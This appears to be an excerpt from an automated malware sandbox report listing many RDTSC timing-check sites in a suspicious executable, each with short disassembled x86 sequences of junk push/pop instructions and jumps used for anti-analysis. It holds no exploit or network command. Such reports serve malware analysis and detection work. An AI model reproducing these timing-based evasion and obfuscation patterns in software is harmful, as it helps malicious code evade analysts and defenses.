Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5557B2 second address: 5557B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5557B8 second address: 5557C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BC10B709Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5557C6 second address: 5557F1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5BC10A35F6h 0x00000008 jmp 00007F5BC10A35FBh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5BC10A3604h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5557F1 second address: 5557F7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 555F99 second address: 555F9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5544CF second address: 554505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b jmp 00007F5BC10B70A9h 0x00000010 je 00007F5BC10B709Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 554505 second address: 554509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 55BE93 second address: 55BEAB instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5BC10B7096h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F5BC10B709Eh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 55BEAB second address: 55BEB0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 55BEB0 second address: 55BECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ebx 0x00000007 jmp 00007F5BC10B709Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jng 00007F5BC10B70AAh 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 55BECE second address: 55BED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 55BED2 second address: 55BED6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 568AD4 second address: 568ADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 568ADC second address: 568B0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F5BC10B7096h 0x0000000c popad 0x0000000d jc 00007F5BC10B70ABh 0x00000013 jmp 00007F5BC10B709Fh 0x00000018 jg 00007F5BC10B7096h 0x0000001e push eax 0x0000001f push edx 0x00000020 jl 00007F5BC10B7096h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 568B0C second address: 568B1A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 568B1A second address: 568B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 568B21 second address: 568B31 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F5BC10A35FBh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 56880C second address: 56881F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5BC10B709Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 56881F second address: 568823 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 568823 second address: 568829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 56C7EE second address: 56C80C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5BC10A3608h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 56C80C second address: 56C816 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5BC10B7096h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 56C97A second address: 56C980 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 57BDB2 second address: 57BDEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jp 00007F5BC10B7096h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f jmp 00007F5BC10B70A8h 0x00000014 jmp 00007F5BC10B70A1h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 58353E second address: 583544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 583544 second address: 583549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 583699 second address: 5836A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007F5BC10A35F6h 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 58396D second address: 583973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 583973 second address: 58397D instructions: 0x00000000 rdtsc 0x00000002 js 00007F5BC10A35F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 58397D second address: 583984 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 583984 second address: 5839A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F5BC10A35FBh 0x0000000f jng 00007F5BC10A35F6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 583D7D second address: 583D83 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 583D83 second address: 583D88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 583D88 second address: 583DBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F5BC10B7096h 0x0000000a popad 0x0000000b jmp 00007F5BC10B70A7h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push esi 0x00000013 push eax 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jc 00007F5BC10B7096h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 58992A second address: 58992E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 58992E second address: 589934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 589620 second address: 58963A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A35FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F5BC10A35F6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 58963A second address: 58963E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 593455 second address: 59345A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 59345A second address: 593465 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F5BC10B7096h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 596726 second address: 596740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jnp 00007F5BC10A35F6h 0x0000000b push eax 0x0000000c pop eax 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 je 00007F5BC10A35F6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5998B2 second address: 5998B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5998B6 second address: 5998C0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5BC10A35F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5998C0 second address: 5998CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F5BC10B7096h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 59E786 second address: 59E790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5BC10A35F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 59E790 second address: 59E7B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 59BC23 second address: 59BC37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BC10A35FEh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5AB47D second address: 5AB4BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BC10B70A0h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jmp 00007F5BC10B70A7h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F5BC10B709Ch 0x0000001c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5AB5E0 second address: 5AB5EA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5BC10A35F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5C43D1 second address: 5C43D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5C47A6 second address: 5C47D8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5BC10A35F6h 0x00000008 jmp 00007F5BC10A3600h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 jmp 00007F5BC10A3604h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5C47D8 second address: 5C47DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5C47DE second address: 5C47EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F5BC10A35F6h 0x0000000a je 00007F5BC10A35F6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5C47EE second address: 5C47F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5C47F2 second address: 5C47F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5C47F8 second address: 5C4804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5C4946 second address: 5C494C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5C494C second address: 5C4951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5C4951 second address: 5C4959 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5C4C96 second address: 5C4CBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A7h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F5BC10B709Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5C4E4C second address: 5C4E70 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5BC10A35F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e jmp 00007F5BC10A3602h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5C4E70 second address: 5C4E76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5C4E76 second address: 5C4E7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5C4E7A second address: 5C4E7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5C6C91 second address: 5C6C95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5C6C95 second address: 5C6C9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5C6C9B second address: 5C6CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5C6CA4 second address: 5C6CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BC10B70A9h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F5BC10B7096h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5CB018 second address: 5CB02F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F5BC10A35FEh 0x0000000c push edx 0x0000000d pop edx 0x0000000e jo 00007F5BC10A35F6h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5CD006 second address: 5CD026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5BC10B709Ch 0x0000000c jmp 00007F5BC10B709Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5CD026 second address: 5CD041 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5BC10A35F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5BC10A35FDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50C009A second address: 50C00A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50A0E80 second address: 50A0ED0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5BC10A3601h 0x00000009 or esi, 1E79E526h 0x0000000f jmp 00007F5BC10A3601h 0x00000014 popfd 0x00000015 mov esi, 7A4F6657h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e jmp 00007F5BC10A35FAh 0x00000023 mov ebp, esp 0x00000025 pushad 0x00000026 mov dx, si 0x00000029 mov edx, ecx 0x0000002b popad 0x0000002c pop ebp 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50A0ED0 second address: 50A0ED4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50A0ED4 second address: 50A0EDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50A0EDA second address: 50A0EE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50A0EE0 second address: 50A0EE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50F012C second address: 50F0149 instructions: 0x00000000 rdtsc 0x00000002 mov bh, cl 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F5BC10B709Eh 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5080165 second address: 50801D1 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F5BC10A3609h 0x00000008 jmp 00007F5BC10A35FBh 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push dword ptr [ebp+0Ch] 0x00000014 pushad 0x00000015 mov ebx, esi 0x00000017 pushfd 0x00000018 jmp 00007F5BC10A3600h 0x0000001d and cl, 00000068h 0x00000020 jmp 00007F5BC10A35FBh 0x00000025 popfd 0x00000026 popad 0x00000027 push dword ptr [ebp+08h] 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F5BC10A3605h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50801D1 second address: 50801D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50A0B60 second address: 50A0B78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10A3604h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50A0B78 second address: 50A0C17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F5BC10B70A6h 0x00000011 push eax 0x00000012 jmp 00007F5BC10B709Bh 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 call 00007F5BC10B70A4h 0x0000001e pushad 0x0000001f popad 0x00000020 pop esi 0x00000021 pushfd 0x00000022 jmp 00007F5BC10B70A1h 0x00000027 and ch, 00000066h 0x0000002a jmp 00007F5BC10B70A1h 0x0000002f popfd 0x00000030 popad 0x00000031 mov ebp, esp 0x00000033 jmp 00007F5BC10B709Eh 0x00000038 pop ebp 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F5BC10B70A7h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50A0C17 second address: 50A0C1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50A0707 second address: 50A0732 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 call 00007F5BC10B70A3h 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5BC10B709Bh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50A0732 second address: 50A078B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5BC10A35FFh 0x00000009 sbb ecx, 100B95AEh 0x0000000f jmp 00007F5BC10A3609h 0x00000014 popfd 0x00000015 mov eax, 28164237h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov dword ptr [esp], ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F5BC10A3609h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50A078B second address: 50A07BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F5BC10B709Eh 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F5BC10B709Ah 0x0000001a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50A07BF second address: 50A07CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A35FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50A07CE second address: 50A07D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50A07D4 second address: 50A07D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50A07D8 second address: 50A07DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
